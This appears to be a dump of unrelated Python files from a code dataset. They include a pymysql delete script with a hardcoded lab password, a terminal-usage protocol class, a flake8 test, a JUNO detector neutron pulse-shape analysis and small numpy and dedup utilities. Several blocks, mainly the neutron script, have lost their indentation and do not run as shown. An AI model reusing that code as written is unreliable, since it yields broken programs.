        password = "4linux",
        db = "4linux",
        charset = "utf8mb4",
        cursorclass = pymysql.cursors.DictCursor)
except Exception as err:
    print("*** ERRO AO TENTAR CONECTAR COM O MYSQL")
    print(err)
else:
    with conexao.cursor() as cursor:
        id_pessoa = input("Informe o ID: ")
        # Parameterized query: the previous str.format() version allowed
        # SQL injection through the typed-in ID.
        cursor.execute("Delete from pessoa WHERE id_pessoa = %s", (id_pessoa,))
    conexao.commit()
finally:
    # The original unconditionally called conexao.close(), which raised a
    # NameError whenever connect() itself failed.
    if conexao is not None:
        conexao.close()
|
999,416 | 717925d0bfe80d55a981d5ed08eb5a50540da2ea | #!/usr/bin/python
# -*- coding:utf-8 -*-
from ByPlatform.ProtocolHelper.ProtocolHelper import *
from ByPlatform.ProtocolHelper.Protocols.ProtocolBase import *
from ByPlatform.Base.OutPutHelper import *
from ByPlatform.StorageHelper.StorageType import StorageType
from ByPlatform.StorageHelper.StorageHelper import StorageHelper
from ByPlatform.StorageHelper.ReadDataHelper import ReadDataHelper
from ByPlatform.Base.TimeHelper import TimeHelper
from datetime import datetime,timedelta
import time
class ProTerminalUsage(ProtocolBase):
    """Request protocol (command 1160): accumulates terminal-usage statistics
    over a date range from the DevicesMonitor store."""
    # When False, days without a monitor record still add 8h to TotalTimes.
    SKIP_COMPUTER_NOT_OPEN = False
    CMD_CODE = "1160"
    def __init__(self):
        super(ProTerminalUsage, self).__init__()
        self.Command = MessageDefine.getCommand(ProTerminalUsage.CMD_CODE)
        # Inclusive query range, as date strings.
        self.StartDate = None
        self.StopDate = None
    def searchDate(self,ackHandle):
        """Query records in [StartDate, StopDate] and accumulate totals into
        `ackHandle` (a ProTerminalUsageAck)."""
        handle = StorageHelper(None, StorageType.DevicesMonitor)
        data = ReadDataHelper()
        data.SetDBService(handle)
        handle.StartStorageServce()
        results = data.QueryRangeData(lgt_conditions=self.StartDate,ltt_condition=self.StopDate, cmp_key = "recorddate")
        # No records at all: nothing to accumulate.
        if not results or len(results) <= 0:
            return
        # Walk every day in the range and match it against the records.
        startDate = TimeHelper.String2Date(self.StartDate)
        stopDate = TimeHelper.String2Date(self.StopDate)
        sepDate = (stopDate - startDate).days + 1
        for oneIndex in range (sepDate):
            timespan = timedelta(days=oneIndex)
            startDateTemp = startDate + timespan
            dataValue = TimeHelper.dateToString(startDateTemp)
            findHandle = None
            for oneResult in results:
                if oneResult["recorddate"] == dataValue:
                    findHandle= oneResult
                    break
            # No record for this day: the machine was never switched on.
            if not findHandle:
                if not ProTerminalUsage.SKIP_COMPUTER_NOT_OPEN:
                    # Still count a full 8-hour working day.
                    ackHandle.TotalTimes = ackHandle.TotalTimes + 8*3600
                continue
            # A record exists: count the 8-hour day plus its interaction time.
            ackHandle.TotalTimes = ackHandle.TotalTimes + 8 * 3600
            ackHandle.InteractTimes = ackHandle.InteractTimes + int(findHandle["interactiontimes"])
            pass
        # Percentage of counted time spent interacting.
        # NOTE(review): raises ZeroDivisionError when TotalTimes stays 0
        # (SKIP_COMPUTER_NOT_OPEN=True with no matching days) — confirm intended.
        ackHandle.Rates = ackHandle.InteractTimes*100.0/ackHandle.TotalTimes
class ProTerminalUsageAck(ProtocolBase):
    """Reply protocol (command 1161) carrying the computed usage totals."""
    CMD_CODE = "1161"
    def __init__(self):
        super(ProTerminalUsageAck, self).__init__()
        self.Command = MessageDefine.getCommand(ProTerminalUsageAck.CMD_CODE)
        self.Name = None          # presumably the terminal's name — confirm against callers
        self.Code = None          # presumably the terminal's identifier — confirm
        self.TotalTimes = 0       # accumulated counted seconds (see searchDate)
        self.InteractTimes = 0    # accumulated interaction seconds
        self.Rates = 0.0          # InteractTimes as a percentage of TotalTimes
if __name__ == "__main__":
MSG = '00000001371021000.000.000.0000005Name:caojiaju|IpAddress:192.168.1.200|HttpPort:29001|UdpPort:28001|Code:09d623c09c4711e8bca1989096c1d848'
abc = ProtocolHelper.bindProtocol(MSG)
abc.loadFromMsg(MSG)
OutPutHelper.consolePrint(abc.packageMsg())
|
999,417 | 7cfae498c9e4925f86b8426c02c6963ee14367bd | import ast
from typing import Set
from flake8_named_arguments import Plugin
def _results(s: str) -> Set[str]:
    """Run the flake8 plugin on source `s` and return its findings
    formatted as '<line>: <col> <message>' strings."""
    tree = ast.parse(s)
    plugin = Plugin(tree)
    return {f'{line}: {col} {msg}' for line, col, msg, _ in plugin.run()}
def test_trivial_case():
    # An empty module must yield no findings at all.
    assert not _results('')
|
999,418 | 3dd338881924e3d917157dc9f258f082ca9815fc | """ Script to analyze Fast Neutron Background in JUNO detector:
In the first part of the script:
- Calculate the pulse shape of the prompt signal of fast neutrons.
- As simulated neutrons, the files user_neutron_10_MeV_{}.root, user_neutron_100_MeV_{}.root,
user_neutron_300_MeV_{}.root and user_neutron_500_MeV_{}.root (from 'conversion_nPE_MeV') are used.
- Files user_neutron_10_MeV_0.root to user_neutron_10_MeV_99.root can not be used, because they deposit too less
energy in the detector and therefore the hittime distribution has only a few ten entries (Qedep only from
0.2 MeV to 5 MeV).
For files user_neutron_100_MeV_0.root to user_neutron_100_MeV_99.root, Qedep is from 1.2 MeV to 7.4 MeV.
For files user_neutron_300_MeV_0.root to user_neutron_300_MeV_99.root, Qedep is from 1.5 MeV to 40 MeV.
For files user_neutron_500_MeV_0.root to user_neutron_500_MeV_99.root, Qedep is from 0.0 MeV to 113 MeV.
- Procedure to get the hittime distribution with vertex reconstruction and time smearing of PMTs:
1. apply same cuts like on prompt signals of NC events:
1.1 energy cut on prompt signal: only neutrons with energy from 10 MeV to 100 MeV (here either 10 or 100 MeV)
are simulated -> energy cut is applied automatically
1.2 volume cut: must be same like for NC events (take initial position of initial particle -> smear it with
vertex resolution with function position_smearing())
2. calculate time of flight:
2.1 for every photon, that hits a PMT (20inch and 3inch), take the PMT position (via PMT ID from file
PMT_position.root) and calculate the time-of-flight distance with the reconstructed position from above.
2.2 with the time-of-flight distance, calculate the time-of-flight of this photon from production to PMT by
considering an effective speed of light in the LS.
3. consider TTS of PMTs:
3.1 for every photon, that hits a PMT (20inch and 3inch), take the time resolution (sigma) of the PMT
(via PMT ID either from file PmtData.root for the 20inch PMTs or set TTS = 5 ns for 3inch PMTs.)
3.2 the TTS of the PMT is FWHM. Therefore calculate sigma from TTS (FWHM = 2*sqrt(2*ln(2)) * sigma).
3.3 smear hittime of detsim with gaussian of sigma (time resolution) around the value of detsim hittime to get
the smeared hittime
4. for every photon, calculate the 'real' hittime (= smeared hittime - time_of_flight) and store it in array
5. Do points 2. to 4. for every photon. Then you get the correct hittime of this event. Build histogram with
correct hittimes and save histogram value in txt file and display histogram in png file
In the second part of the script:
- use calculated pulse shapes of fast neutrons and
"""
import datetime
import ROOT
import sys
import NC_background_functions
import numpy as np
from matplotlib import pyplot as plt
import os
# get the date and time, when the script was run:
date = datetime.datetime.now()
now = date.strftime("%Y-%m-%d %H:%M")
""" set flag, if hittimes must be calculated or read from file: """
flag_read_hittime_from_file = True
""" define time window and bin width: """
# set time window of whole signal in ns:
min_time = -50
max_time = 2000
# set time in ns, where the prompt signal should be 0:
time_limit_prompt = 1000
# Set bin-width of hittime histogram in ns:
binwidth = 5.0
""" PSD parameter from analyze_PSD_cut_v2.py: """
# corresponding NC PSD suppression:
NC_suppression = 99.0
# tail_start in ns:
tail_start = 275.0
# tail stop in ns:
tail_stop = 600.0
# TTR value corresponding to the PSD cut:
TTR_cut = 0.01662
""" set cut parameters from analysis of NC events and IBD events: """
# cut-radius in mm:
radius_cut = 16000
# prompt energy cut in MeV:
E_prompt_min = 10.0
E_prompt_max = 100.0
# time cut in ns:
T_cut_min = 1000.0
T_cut_max = 1000000.0
# multiplicity:
multiplicity = 1
# delayed energy cut in MeV:
E_delayed_min_MeV = 1.80
E_delayed_max_MeV = 2.55
# distance cut in mm:
distance_cut = 500.0
# delayed volume cut in mm:
delayed_volume = 17700.0
# path, where root files of neutron simulation are saved:
input_path_neutron = "/local/scratch1/pipc51/astro/blum/conversion_nPE_MeV/neutron_output/"
# path, where TTR values of NC and IBD events, that pass all cuts, are stored:
input_path_TTR = ("/home/astro/blum/juno/atmoNC/data_NC/output_detsim_v2/DCR_results_{0:.0f}mm_{1:.0f}MeVto{2:.0f}MeV_"
"{3:.0f}nsto{4:.0f}ms_mult{5}_{6:.0f}keVto{7:.0f}keV_dist{8:.0f}mm_R{9:.0f}mm_PSD{10:.0f}/"
.format(radius_cut, E_prompt_min, E_prompt_max, T_cut_min, T_cut_max/1000000, multiplicity,
E_delayed_min_MeV*1000, E_delayed_max_MeV*1000, distance_cut, delayed_volume, NC_suppression))
# path, where hittime distributions (png and txt) are saved:
input_path_hittimes = "/home/astro/blum/PhD/work/MeVDM_JUNO/fast_neutrons/"
# output_path_neutron = "/home/astro/blum/PhD/work/MeVDM_JUNO/fast_neutrons/"
output_path_neutron = "/home/astro/blum/PhD/work/MeVDM_JUNO/fast_neutrons/DCR/"
""" analyze neutron hittime distribution for kinetic energy of 10 MeV and 100 MeV: """
# first file of neutron simulation:
first_file_neutron = 0
# last file of neutron simulation (100 corresponds to user_neutron_300_MeV_0.root, 200 corresponds to
# user_neutron_500_MeV_0.root and 299 corresponds to user_neutron_500_MeV_99.root):
last_file_neutron = 1099
# number of events per file:
number_evts_per_file = 10
# total number of neutron events (factor 2 for 10 MeV and 100 MeV):
number_evts_total = (last_file_neutron - first_file_neutron + 1) * number_evts_per_file
# preallocate number of events that are analyzed (pass volume cut):
number_analyzed = 0
# array, where TTR values of neutron events are saved:
array_TTR_neutron = []
# array, where prompt energy of neutron events is saved in MeV:
array_E_prompt_neutron = []
# number of neutron events, that pass the PSD cut:
number_neutron_after_PSD = 0
""" load position of the PMTs and corresponding PMT ID from file PMT_position.root: """
file_PMT_position = "/home/astro/blum/juno/atmoNC/PMT_information/PMT_position.root"
# array with PMT ID and corresponding x, y, z position in mm:
pmtID_pos_file, x_pos_pmt, y_pos_pmt, z_pos_pmt = NC_background_functions.get_pmt_position(file_PMT_position)
""" load 'time resolution' in ns of the 20 inch PMTs and corresponding PMT ID from file PmtData.root: """
file_PMT_time = "/home/astro/blum/juno/atmoNC/PMT_information/PmtData_old.root"
# array with PMT ID and corresponding sigma in ns:
pmtID_time_file, sigma_time_20inch = NC_background_functions.get_20inchpmt_tts(file_PMT_time)
# set TTS (FWHM) of the 3inch PMTs in ns:
tts_3inch = 5.0
# calculate time resolution (sigma) for the 3inch PMTs in ns:
sigma_time_3inch = tts_3inch / (2 * np.sqrt(2 * np.log(2)))
# set effective speed of light in the liquid scintillator in mm/ns (see page 12 of
# 20200111_zli_VertexReconstruction_page20.pdf in folder /home/astro/blum/PhD/paper/reconstruction/).
# The effective refraction index in LS depends on the TTS of the PMT (Hamamatsu with TTS ~ 2.7 ns,
# NNVT with TTS ~ 18 ns).
# for Hamamatsu and 3inch PMTs (TTS ~ 2.7 ns and 5 ns) use n_eff = 1.544 (c/n_eff = 299792458 m / 1.544 s
# = 194166100 * 10**(-6) mm/ns ~ 194.17 mm/ns):
c_effective_smallTTS = 194.17
# for MCP PMTs (TTS ~ 18 ns) use n_eff = 1.578 (c/n_eff = 299792458 m / 1.578 s = 189982546 * 10**(-6) mm/ns ~
# 189.98 mm/ns):
c_effective_largeTTS = 189.98
# if pulse shapes are not calculated already, read ROOT files and save pulse shape to txt file:
if not flag_read_hittime_from_file:
# loop over root files with neutron simulation:
for index in range(first_file_neutron, last_file_neutron + 1, 1):
# load user_neutron_{}.root file:
if index < 100:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_10_MeV_{0:d}.root".format(index))
elif 100 <= index < 200:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_100_MeV_{0:d}.root".format(index-100))
elif 200 <= index < 300:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_300_MeV_{0:d}.root".format(index-200))
elif 300 <= index < 1000:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_500_MeV_{0:d}.root".format(index-300))
elif 1000 <= index <= 1099:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_1000_MeV_{0:d}.root".format(index-1000))
else:
print("--------------------------------- ERROR-------------------")
print(rfile)
# get the "evt"-TTree from the TFile:
rtree_evt = rfile.Get("evt")
# get geninfo tree from TFile:
rtree_geninfo = rfile.Get("geninfo")
# get prmtrkdep tree from TFile:
rtree_prmtrkdep = rfile.Get("prmtrkdep")
# get the number of events in the 'evt' Tree:
num_events_evt = rtree_evt.GetEntries()
# check number of events:
if num_events_evt != number_evts_per_file:
sys.exit("ERROR: number of events in root file ({0:d}) != {1:d}"
.format(num_events_evt, number_evts_per_file))
# loop over the events:
for event in range(num_events_evt):
""" check volume cut: """
# get current event in prmtrkdep tree:
rtree_prmtrkdep.GetEntry(event)
# get number of initial particles:
n_init_part = int(rtree_prmtrkdep.GetBranch('nInitParticles').GetLeaf('nInitParticles').GetValue())
if n_init_part != 1:
# check if there is just one initial positron:
sys.exit("ERROR: more than 1 initial particles in event {0:d}".format(event))
# get quenched deposited energy of the initial particle in MeV:
qedep_prmtrkdep = float(rtree_prmtrkdep.GetBranch("Qedep").GetLeaf("Qedep").GetValue())
# do qedep cut (qedep must be between 10 and 100 MeV):
if qedep_prmtrkdep < E_prompt_min:
continue
if qedep_prmtrkdep > E_prompt_max:
continue
# get current event in geninfo tree:
rtree_geninfo.GetEntry(event)
# get number of initial particles:
n_init_particles = int(rtree_geninfo.GetBranch('nInitParticles').GetLeaf('nInitParticles').GetValue())
if n_init_particles != 1:
# check if there is just one initial positron:
sys.exit("ERROR: more than 1 initial particles in event {0:d}".format(event))
# get initial x, y, z position:
x_init = float(rtree_geninfo.GetBranch('InitX').GetLeaf('InitX').GetValue())
y_init = float(rtree_geninfo.GetBranch('InitY').GetLeaf('InitY').GetValue())
z_init = float(rtree_geninfo.GetBranch('InitZ').GetLeaf('InitZ').GetValue())
# do vertex reconstruction with function position_smearing():
# Smear x,y and z position of the initial position (returns reconstructed position in mm):
x_reconstructed = NC_background_functions.position_smearing(x_init, qedep_prmtrkdep)
y_reconstructed = NC_background_functions.position_smearing(y_init, qedep_prmtrkdep)
z_reconstructed = NC_background_functions.position_smearing(z_init, qedep_prmtrkdep)
# calculate distance to detector center in mm:
r_reconstructed = np.sqrt(x_reconstructed**2 + y_reconstructed**2 + z_reconstructed**2)
# check if reconstructed position is within 17 m:
if r_reconstructed >= 17000.0:
continue
else:
number_analyzed += 1
""" calculate the photon emission time distribution (time of flight correction with reconstructed position
and time smearing with TTS for each hit): """
# get event of 'evt'-tree:
rtree_evt.GetEntry(event)
# get evtID of the tree and compare with event:
evt_id = int(rtree_evt.GetBranch('evtID').GetLeaf('evtID').GetValue())
if evt_id != event:
sys.exit("ERROR: evtID of tree ({0:d}) != {1:d}".format(evt_id, event))
# get number of photons of this event:
n_photons = int(rtree_evt.GetBranch('nPhotons').GetLeaf('nPhotons').GetValue())
# preallocate list, where corrected (real) hit-times are saved:
hittime_array = []
# loop over every photon in the event:
for index1 in range(n_photons):
# get number of pe per photon and check if it is equal to 1:
npe = int(rtree_evt.GetBranch('nPE').GetLeaf('nPE').GetValue(index1))
if npe != 1:
sys.exit("ERROR: more than one p.e. per photon in event {0:d}, file {1}".format(event, index))
# get the pmtID of the hit PMT:
pmtID = int(rtree_evt.GetBranch('pmtID').GetLeaf('pmtID').GetValue(index1))
""" time of flight correction: """
# get hittime of PMT from tree in ns:
hittime = float(rtree_evt.GetBranch('hitTime').GetLeaf('hitTime').GetValue(index1))
# get position of the PMT with specific pmtID (pmtID is ascending number from 0 to 17738
# (17739 large PMTs) and from 300000 to 336571 (36572 small PMTs)).
# For large PMTs -> For 20inch PMTs, the pmtID is equal to index of x,y,z_pos_pmt array.
# For small PMTs -> For 3inch PMTs, the pmtID - (300000 - 17739) is equal to index of
# x,y,z_pos_pmt array.
# check if PMT is 20 inch or 3inch (pmtID < 50000 means 20inch PMT):
if pmtID < 50000:
# 20inch PMT:
# get PMT position in mm from arrays:
x_pmt = x_pos_pmt[pmtID]
y_pmt = y_pos_pmt[pmtID]
z_pmt = z_pos_pmt[pmtID]
else:
# 3inch PMT:
# calculate index of pos_pmt array that correspond to pmtID of 3inch PMTs (for example:
# first small PMT: 300000-282261 = 17739, last small PMT: 336571-282261 = 54310)
index_3inch = pmtID - 282261
# get PMT position in mm from arrays:
x_pmt = x_pos_pmt[index_3inch]
y_pmt = y_pos_pmt[index_3inch]
z_pmt = z_pos_pmt[index_3inch]
# calculate distance between reconstructed position of event and position of PMT (in mm):
distance_tof = np.sqrt((x_reconstructed - x_pmt)**2 + (y_reconstructed - y_pmt)**2 +
(z_reconstructed - z_pmt)**2)
""" time resolution of PMT: """
# get time resolution of PMT with specific pmtID (pmtID is ascending number from 0 to 17738 (17739 large
# PMTs)) -> For 20inch PMTs, the pmtID is equal to index of sigma_time_20inch array.
# check if PMT is 20 inch or 3inch (pmtID < 50000 means 20inch PMT):
if pmtID < 20000:
# 20inch PMT:
# get time resolution (sigma) of PMT in ns from array:
sigma_pmt_1 = sigma_time_20inch[pmtID]
if sigma_pmt_1 < 3:
# Hamamatsu PMT:
# sigma = TTS / (2*np.sqrt(2*np.log(2))) -> TTS = 7 ns as edge between Hamamatsu and MCP
# -> sigma = 3 ns: Hamamatsu if sigma < 3 ns, MCP if sigma > 3 ns:
# For Hamamatsu PMTs use sigma_t / TTS of old PmtData_old.root file:
sigma_pmt = sigma_pmt_1
# Calculate time of flight in ns for the small TTS:
time_of_flight = distance_tof / c_effective_smallTTS
else:
# MCP PMT:
# do NOT use sigma_t / TTS from old PmtData_old.root file, because there the TTS is
# around 12 ns.
# Use TTS of 18 ns and calculate sigma_pmt:
TTS_MCP = 18.0
sigma_pmt = TTS_MCP / (2 * np.sqrt(2 * np.log(2)))
# Calculate time of flight in ns for the large TTS:
time_of_flight = distance_tof / c_effective_largeTTS
elif 20000 < pmtID < 40000:
# there are some PMTs with ID around 30000 (user_atmoNC_7.root, event=32: 30637, 30276, 30573,30561,
# 30377) -> PMTs with ID above 30000 are Water Pool PMTs!!
# go to next photon:
continue
else:
# 3inch PMT:
sigma_pmt = sigma_time_3inch
# Calculate time of flight in ns for the small TTS:
time_of_flight = distance_tof / c_effective_smallTTS
# consider time resolution of PMT by generating normal distributed random number with mu = hittime and
# sigma = sigma_pmt (only the hittime at the PMT must be smeared, not the time-of-flight):
hittime_tts = np.random.normal(hittime, sigma_pmt)
""" calculate the 'real' hittime of the photon in ns: """
hittime_real = hittime_tts - time_of_flight
# take only hittimes that are within time window specified by min_time and max_time:
if min_time <= hittime_real <= max_time:
# append real hittime to array:
hittime_array.append(hittime_real)
# build histogram, where hittimes are saved:
# set bin-edges of hittime histogram in ns:
bins_hittime = np.arange(min_time, max_time + binwidth, binwidth)
# build hittime histogram:
npe_per_hittime, bin_edges_hittime = np.histogram(hittime_array, bins_hittime)
# before saving the histogram of the hittimes check the reconstructed distance:
if r_reconstructed < radius_cut:
# event within 16 m:
event_position = 16
elif radius_cut <= r_reconstructed < 17000.0:
# event between 16 m and 17 m:
event_position = 17
""" save time distribution/ pulse shape to file: """
# save hittime distribution of the event to txt file:
# build list, where 0th entry is start-hittime in ns, 1st entry is last-hittime in ns, 2nd entry is
# binwidth in ns and the following entries are nPE of each hittime-bin of whole signal:
npe_per_hittime_save = [x_reconstructed, y_reconstructed, z_reconstructed]
npe_per_hittime_save.extend([min_time, max_time, binwidth])
npe_per_hittime_save.extend(npe_per_hittime)
np.savetxt(input_path_hittimes + "hittimes/file{0:d}_evt{1:d}_pulse_shape_R{2:d}.txt"
.format(index, event, event_position),
npe_per_hittime_save, fmt='%1.2f',
header="Pulse shape: Number of pe as function of the time "
"(time-of-flight correction and TTS smearing) of file user_neutron_{0:d}.root,"
"\nevent {1:d}, {2}:"
"\ntime window of pulse shape: from {3:.3f} ns to {4:.3f} ns with "
"bin-width = {5:0.3f} ns,"
.format(index, event, now, min_time, max_time, binwidth))
else:
# read pulse shapes for each event from txt file:
# loop over all files in folder input_path_neutron + "hittimes/", that start with 'file' and end with 'R16.txt'
# (files where hittime distribution is saved, each file is equal to one event):
for file_neutron in os.listdir(input_path_hittimes + "hittimes/"):
# if file_neutron.startswith("file") and file_neutron.endswith("R{0:d}.txt".format(int(radius_cut/1000.0))):
if file_neutron.startswith("file") and file_neutron.endswith("R{0:d}_DCR.txt".format(int(radius_cut/1000.0))):
# get the file name:
file_name_neutron = input_path_hittimes + "hittimes/" + file_neutron
# read txt file:
npe_from_file = np.loadtxt(file_name_neutron)
# get reconstructed position in mm:
x_reconstructed = npe_from_file[0]
y_reconstructed = npe_from_file[1]
z_reconstructed = npe_from_file[2]
# get min_time, max_time and binwidth from txt file and compare it with the values set above:
min_time_total_txt = npe_from_file[3]
if min_time != min_time_total_txt:
sys.exit("ERROR: min_time_total from file differ from the value set in script")
max_time_total_txt = npe_from_file[4]
if max_time != max_time_total_txt:
sys.exit("ERROR: max_time_total from file differ from the value set in script")
binwidth_txt = npe_from_file[5]
if binwidth != binwidth_txt:
sys.exit("ERROR: binwidth from file differ from the value set in script")
# the rest of pulse_shape_data_IBD is the hittime distribution histogram in nPE per bin. Take only the
# prompt signal defined by start_time and end_time:
nPE_per_bin = npe_from_file[6:(int((time_limit_prompt + binwidth + np.abs(min_time)) / binwidth)+3)]
# calculate the total number of PE of the prompt signal:
nPE_total = np.sum(nPE_per_bin)
# convert nPE_total to energy in MeV:
E_prompt = NC_background_functions.conversion_npe_to_evis(nPE_total)
# append E_prompt to array:
array_E_prompt_neutron.append(E_prompt)
# set the time window corresponding to nPE_per_bin:
time_window = np.arange(min_time, time_limit_prompt+binwidth, binwidth)
# get TTR and normalized pulse shape of neutron event:
TTR_neutron, npe_norm_neutron = NC_background_functions.pulse_shape(time_window, nPE_per_bin, tail_start,
tail_stop)
# check if ttr-value is not 0:
# if TTR_neutron == 0:
# continue
# increment number_analyzed:
number_analyzed += 1
# append TTR value to array:
array_TTR_neutron.append(TTR_neutron)
# check if event passes PSD cut:
if TTR_neutron <= TTR_cut:
# event passes PSD cut:
number_neutron_after_PSD += 1
print("energy of event that pass PSD cut = {0:.2f} MeV".format(E_prompt))
""" display energy of prompt signal in histogram: """
h3 = plt.figure(3, figsize=(11, 6))
binwidth_energy = 1.0
Bins_energy = np.arange(0.0, 200.0, binwidth_energy)
N_energy, bins_energy, patches = plt.hist(array_E_prompt_neutron, bins=Bins_energy, histtype="step", align='mid',
color="r", label="entries = {0:d}".format(len(array_E_prompt_neutron)))
plt.xlabel("Visible energy of prompt signal in MeV")
plt.ylabel("events per bin (bin width = {0:.1f} MeV)")
plt.title("Energy spectrum of prompt signal of simulated neutron events")
plt.legend()
plt.grid()
plt.savefig(output_path_neutron + "E_prompt_{0:.0f}MeVto{1:.0f}MeV_R{2:.0f}mm.png"
.format(min(Bins_energy), max(Bins_energy), radius_cut))
plt.close()
h4 = plt.figure(4)
plt.hist2d(array_E_prompt_neutron, array_TTR_neutron, bins=100)
plt.hlines(TTR_cut, xmin=min(array_E_prompt_neutron), xmax=max(array_E_prompt_neutron),
           label="TTR cut value = {0:.5f}".format(TTR_cut))
plt.xlabel("visible energy of prompt signal in MeV")
# BUG FIX: the unit "ns" was missing after the tail-stop value in the label.
plt.ylabel("TTR value for tail window from {0:.0f} ns to {1:.0f} ns".format(tail_start, tail_stop))
plt.title("TTR vs visible energy of simulated neutron events")
plt.grid()
plt.legend()
plt.savefig(output_path_neutron + "TTR_vs_Evis_{0:.0f}ns_{1:.0f}ns_R{2:.0f}mm.png".format(tail_start, tail_stop,
                                                                                          radius_cut))
plt.close()
# all neutron events within radius_cut and Qedep_prmtrkdep between 10 and 100 MeV are analyzed:
# calculate PSD neutron suppression:
PSD_neutron_suppression = 1.0 - float(number_neutron_after_PSD) / float(number_analyzed)
# print information about PSD efficiency of neutron events:
print("PSD cut: tail from {0:.0f} ns to {1:.0f} ns, TTR cut value = {2:.5f} (NC suppression {3:.0f} %)"
.format(tail_start, tail_stop, TTR_cut, NC_suppression))
print("number of analyzed neutron events:")
print(number_analyzed)
print("number of neutron events after PSD cut:")
print(number_neutron_after_PSD)
print("PSD neutron suppression in %:")
print(PSD_neutron_suppression * 100.0)
""" compare TTR values of neutron events with TTR values of NC and IBD events: """
# load TTR values of NC events that pass all cuts (before PSD):
array_TTR_NC = np.loadtxt(input_path_TTR + "TTR_IBDlike_NCevents_{0:.0f}ns_to_{1:.0f}ns.txt"
.format(tail_start, tail_stop))
array_TTR_IBD = np.loadtxt(input_path_TTR + "TTR_beforePSD_IBDevents_{0:.0f}ns_to_{1:.0f}ns.txt"
.format(tail_start, tail_stop))
# check, how many NC events pass the PSD cut:
number_NC_after_PSD = 0
for index2 in range(len(array_TTR_NC)):
if array_TTR_NC[index2] <= TTR_cut:
number_NC_after_PSD += 1
# calculate PSD NC suppression:
PSD_NC_suppression = 1.0 - float(number_NC_after_PSD) / float(len(array_TTR_NC))
# check, how many IBD events pass the PSD cut:
number_IBD_after_PSD = 0
for index2 in range(len(array_TTR_IBD)):
if array_TTR_IBD[index2] <= TTR_cut:
number_IBD_after_PSD += 1
# calculate PSD IBD suppression:
PSD_IBD_suppression = 1.0 - float(number_IBD_after_PSD) / float(len(array_TTR_IBD))
# display ttr-values for IBD, NC and fast neutron events for the given configuration:
h1 = plt.figure(1, figsize=(11, 6))
First_bin = 0.0
Last_bin = 0.05
Bin_width = (Last_bin-First_bin) / 200
Bins = np.arange(First_bin, Last_bin+Bin_width, Bin_width)
plt.hist(array_TTR_IBD, bins=Bins, histtype="step", align='mid', color="r",
label="prompt signal of IBD events after all cuts (entries = {0:d})".format(len(array_TTR_IBD)))
plt.hist(array_TTR_NC, bins=Bins, histtype="step", align='mid', color="b",
label="prompt signal of NC events that mimic IBD signal (entries = {0:d})".format(len(array_TTR_NC)))
plt.hist(array_TTR_neutron, bins=Bins, histtype="step", align='mid', color="g",
label="prompt signal of neutrons representing fast neutron events (entries = {0:d})"
.format(number_analyzed))
plt.xlabel("tail-to-total ratio")
plt.ylabel("events")
plt.title("Tail-to-total ratio of prompt signals of IBD, NC and fast neutron events" +
"\n(tail window {0:0.1f} ns to {1:0.1f} ns)".format(tail_start, tail_stop))
plt.legend()
plt.grid()
plt.savefig(output_path_neutron + "TTR_{0:.0f}_{1:.0f}nsto{2:.0f}ns_PosNCfastN_R{3:.0f}mm.png"
.format(NC_suppression, tail_start, tail_stop, radius_cut))
plt.close()
# display tot-values for positrons, NC and fast neutron events for the given configuration with efficiencies:
h2 = plt.figure(2, figsize=(11, 6))
First_bin = 0.0
Last_bin = 0.05
Bin_width = (Last_bin-First_bin) / 200
Bins = np.arange(First_bin, Last_bin+Bin_width, Bin_width)
n_pos_1, bins_pos_1, patches_pos_1 = plt.hist(array_TTR_IBD, bins=Bins, histtype="step", align='mid',
color="r", linewidth=1.5,
label="prompt signal of IBD events after all cuts "
"(entries = {0:d})".format(len(array_TTR_IBD)))
n_NC_1, bins_NC_1, patches_NC_1 = plt.hist(array_TTR_NC, bins=Bins, histtype="step", align='mid',
color="b", linewidth=1.5,
label="prompt signal of NC events that mimic IBD signal "
"(entries = {0:d})".format(len(array_TTR_NC)))
n_n_1, bins_n_1, patches_n_1 = plt.hist(array_TTR_neutron, bins=Bins, histtype="step", align='mid',
color="g", linewidth=1.5,
label="prompt signal of neutrons representing fast neutron "
"events (entries = {0:d})"
.format(number_analyzed))
plt.vlines(TTR_cut, 0, max(n_pos_1)+max(n_pos_1)/10, colors="k", linestyles="--",
label="$\\epsilon_{IBD}$ = "+"{0:0.2f} %\n".format(PSD_IBD_suppression * 100.0) +
"$\\epsilon_{NC}$ = "+"{0:0.2f} %\n".format(PSD_NC_suppression * 100.0) +
"$\\epsilon_{fastN}$ = "+"{0:0.2f} %\n".format(PSD_neutron_suppression * 100.0) +
"tot value = {0:.5f}".format(TTR_cut))
plt.xlabel("tail-to-total ratio")
plt.ylabel("events")
plt.title("Tail-to-total ratio of prompt signals of IBD, NC and fast neutron events" +
"\n(tail window {0:0.1f} ns to {1:0.1f} ns)".format(tail_start, tail_stop))
plt.legend()
plt.grid()
plt.savefig(output_path_neutron + "TTR_{0:.0f}_{1:.0f}nsto{2:.0f}ns_PosNCfastN_R{3:.0f}mm_efficiencies.png"
.format(NC_suppression, tail_start, tail_stop, radius_cut))
plt.close()
|
999,419 | a638b874d9f5a3eb463777041196f3e7b99d3b52 | import numpy as np
# Small 2-D indexing/slicing demo on a 3x3 integer array.
arr2d=np.array([[1,2,3 ],[4,5,6],[7,8,9]])
print(arr2d)
#print(arr2d[1][2])
#slices of 2d array
slice1=arr2d[0:2,0:2]
#print(slice1)
#arr2d[:2,1:]=15
#print(arr2d)
#using loops to index
arr_len=arr2d.shape[0]
for i in range(arr_len):
    # Scalar i is broadcast across the whole row, so row i becomes [i, i, i].
    arr2d[i]=i
#print(arr2d)
# Fancy indexing with a list of row indices returns the rows in that order.
print(arr2d[[0,1]])
print(arr2d[[1,0]]) |
999,420 | a4b426d481f1da01c9707ca659d968f1a97794cd | """Export resources."""
from .logging import LOGGER as logger
from .logging import config_logs
|
999,421 | 5d7bcc246f81228836f7d1baa730f032218b486c | from threading import Lock
from core.base.data.LSHBasedFixSizeHash import LSHBasedFixSizeHash
from datasketch import MinHash
from services.NLPService import NLPService
class DistinctTask:
    """Thread-safe singleton that detects near-duplicate texts via MinHash + LSH."""
    _lock = Lock()
    _instance = None
    @classmethod
    def instance(cls):
        """Return the process-wide singleton, creating it lazily.

        Double-checked locking: the unlocked fast path avoids lock contention
        once the instance exists; the locked re-check prevents double creation.
        """
        if cls._instance is None:
            with cls._lock:
                if cls._instance is None:
                    cls._instance = cls()
        return cls._instance
    def __init__(self):
        # LSH index holding the MinHash sketches of all texts seen so far.
